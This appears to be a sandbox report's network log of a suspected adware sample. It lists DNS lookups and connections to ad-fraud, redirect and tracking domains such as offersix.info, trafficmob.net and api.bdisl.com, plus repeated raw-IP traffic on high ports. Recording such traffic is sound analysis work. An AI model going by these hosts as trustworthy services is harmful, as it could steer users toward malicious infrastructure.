US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 top.theresultsengine.com udp
FR 51.91.200.241:443 top.theresultsengine.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 top.allresultsweb.com udp
FR 51.91.200.241:443 top.allresultsweb.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 top.faqtoids.com udp
FR 51.91.200.241:443 top.faqtoids.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 top.searchinfonow.com udp
FR 51.91.200.241:443 top.searchinfonow.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 techadsmedia.com udp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
FR 51.91.200.241:443 techadsmedia.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.119.102:32795 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 techadsmedia.com udp
US 104.248.119.102:32795 tcp
FR 51.91.200.241:443 techadsmedia.com tcp
US 8.8.8.8:53 techadsmedia.com udp
FR 51.91.200.241:443 techadsmedia.com tcp
US 8.8.8.8:53 d10lpsik1i8c69.cloudfront.net udp
US 8.8.8.8:53 techadsmedia.com udp
FR 51.91.200.241:443 techadsmedia.com tcp
NL 65.9.84.136:443 d10lpsik1i8c69.cloudfront.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 cdn.taboola.com udp
US 151.101.1.44:443 cdn.taboola.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.170:443 content-autofill.googleapis.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 216.58.214.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.10:443 content-autofill.googleapis.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 settings.luckyorange.net udp
US 172.67.75.100:443 settings.luckyorange.net tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 trc.taboola.com udp
US 151.101.1.44:443 trc.taboola.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
US 8.8.8.8:53 api.bdisl.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 104.22.7.191:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.bing.com udp
US 104.248.224.82:40573 tcp
US 204.79.197.200:443 www.bing.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 www.loopcloud.com udp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.43:443 impression.appsflyer.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.127:443 impression.appsflyer.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 8.8.8.8:53 www.loopcloud.com udp
US 104.18.0.59:443 www.loopcloud.com tcp
US 104.248.224.82:40573 tcp
US 104.18.0.59:443 www.loopcloud.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.51:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 impression.appsflyer.com udp
NL 65.9.83.76:443 impression.appsflyer.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.ghastrk.com udp
US 35.244.206.233:443 www.ghastrk.com tcp
US 104.248.224.82:40573 tcp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 8.8.8.8:53 www.loopmasters.com udp
US 104.18.13.51:443 www.loopmasters.com tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 searchengineads.net udp
VN 103.63.108.18:443 searchengineads.net tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.119.102:32795 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 searchada.com udp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 3.234.28.191:443 searchada.com tcp
US 8.8.8.8:53 www.trafficmob.net udp
US 8.8.8.8:53 impression.appsflyer.com udp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.119.102:32795 tcp
NL 65.9.83.13:443 impression.appsflyer.com tcp
US 8.8.8.8:53 searchada.com udp
US 3.234.28.191:443 searchada.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
US 8.8.8.8:53 api.bdisl.com udp
SG 172.104.40.4:80 offersix.info tcp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 172.67.128.160:80 giftsendmedia.com tcp
US 8.8.8.8:53 fuzeclick.offerstrack.net udp
SG 47.241.22.124:80 fuzeclick.offerstrack.net tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 130.211.37.129:443 www.trafficmob.net tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 104.248.224.82:40573 tcp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 142.250.66.101:443 tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 www.aawrnstrk.com udp
US 35.244.206.233:443 www.aawrnstrk.com tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.224.82:40573 tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 api.bdisl.com udp
US 104.250.148.146:80 api.bdisl.com tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 adyourapp505.o18.click udp
US 172.67.11.240:443 adyourapp505.o18.click tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 offersix.info udp
SG 172.104.40.4:80 offersix.info tcp
US 104.248.224.82:40573 tcp
US 8.8.8.8:53 view.adjust.com udp
DE 185.151.204.50:443 view.adjust.com tcp
US 104.248.119.102:32795 tcp
US 104.248.119.102:32795 tcp
US 8.8.8.8:53 ajax.cloudflare.com udp
US 104.16.167.35:443 ajax.cloudflare.com tcp
